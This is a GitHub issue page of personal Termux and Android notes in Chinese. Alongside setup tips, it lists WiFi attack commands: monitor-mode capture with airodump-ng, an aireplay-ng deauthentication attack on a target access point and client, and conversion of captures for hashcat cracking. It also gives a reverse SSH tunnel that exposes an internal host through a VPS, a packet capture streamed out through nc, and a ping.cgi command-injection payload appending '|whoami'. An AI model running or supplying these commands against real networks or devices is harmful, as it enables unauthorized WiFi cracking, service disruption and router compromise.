search

shownb / shownb.github.com

shownb.github.io
shownb.github.io
5 stars 1 forks source link

termux aircrack & .... #39

Open shownb opened 5 years ago

shownb commented 5 years ago

curl的安装 有问题用apt install libcurl --reinstall 修复

python的安装相关 真的是这个世界分两个python https://wiki.termux.com/wiki/Python

tsudo nano /data/misc/wifi/wpa_supplicant.conf svc wifi enable

一定不要用root权限来运行apt 运行了?解决方法是:

#restorecon -v -R /data/data/com.termux

tsu用法

PATH=$PATH:/sbin/su:/su/bin:/su/xbin:/system/bin:/system/xbin

android获取默认dns命令 /system/bin/getprop net.dns1

wifi测试部分 wifi monitor脚本

ip link set wlan0 down
ip link set wlan0 up
/system/bin/nexutil -d
/system/bin/nexutil -m2
LD_PRELOAD=/system/lib/libfakeioctl.so airodump-ng wlan0

wifi capture脚本

ip link set wlan0 down
ip link set wlan0 up
/system/bin/nexutil -d
/system/bin/nexutil -m2
LD_PRELOAD=/system/lib/libfakeioctl.so airodump-ng --ivs --bssid A1:A2:A3:A4:A5:A6 -w haha -c 1 wlan0

wifi 断断断

LD_PRELOAD=/system/lib/libfakeioctl.so aireplay-ng --deauth 10 -a A1:A2:A3:A4:A5:A6 -c b1:b2:b3:b4:b5:b6 wlan0

ivs 转换为hashcat的

aircrack-ng -J new.hccap old.ivs

反向代理 内网的一个尘埃

ssh -ngfNTR 7777:localhost:22 vpsuser@vpsip

自鸡

ssh -p 7777 -qngfNTD 1080 内网用户@vpsip

-f: 后台执行ssh指令 -g: 允许远程主机连接主机的转发端口 -T: 禁止分配伪终端. -n:把 stdin 重定向到 /dev/null (实际上防止从 stdin 读取数据).

一个简单的python版的ftp服务器

from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
from pyftpdlib.authorizers import DummyAuthorizer

class MyHandler(FTPHandler):

    def on_connect(self):
        print ("%s:%s connected" % (self.remote_ip, self.remote_port))

    def on_disconnect(self):
        # do something when client disconnects
        pass

    def on_login(self, username):
        # do something when user login
        pass

    def on_logout(self, username):
        # do something when user logs out
        pass

    def on_file_sent(self, file):
        # do something when a file has been sent
        print(self.username, file)
        pass

    def on_file_received(self, file):
        # do something when a file has been received
        print(self.username, file)
        pass

    def on_incomplete_file_sent(self, file):
        # do something when a file is partially sent
        print(self.username, file)
        pass

    def on_incomplete_file_received(self, file):
        # remove partially uploaded files
        import os
        os.remove(file)

def main():
    authorizer = DummyAuthorizer()
    authorizer.add_user('user', '12345', homedir='.', perm='elradfmwMT')
    authorizer.add_anonymous(homedir='.')

    handler = MyHandler
    handler.authorizer = authorizer
    server = FTPServer(('', 2121), handler)
    server.serve_forever()

if __name__ == "__main__":
    main()

用法 ftpget -u user -p 12345 xxxx -P 2121 test.py

后台运行命令 ./c -c 1.1.1.1:8888 > log 2>&1 &

远程抓包 抓包机器: tcpdump -s 0 -i en0 not port 19191 -w - |nc 远程机器ip 7777 远程机器: nc -l -p 7777 > dump.cap

ping 命令注入 ping.cgi?diagIntfT=ppp0&diagAddrT=8.8.8.8|whoami&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1

shownb commented 5 years ago

dropbear的配置 mkdir /etc/dropbear/ dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key dropbear -p 8022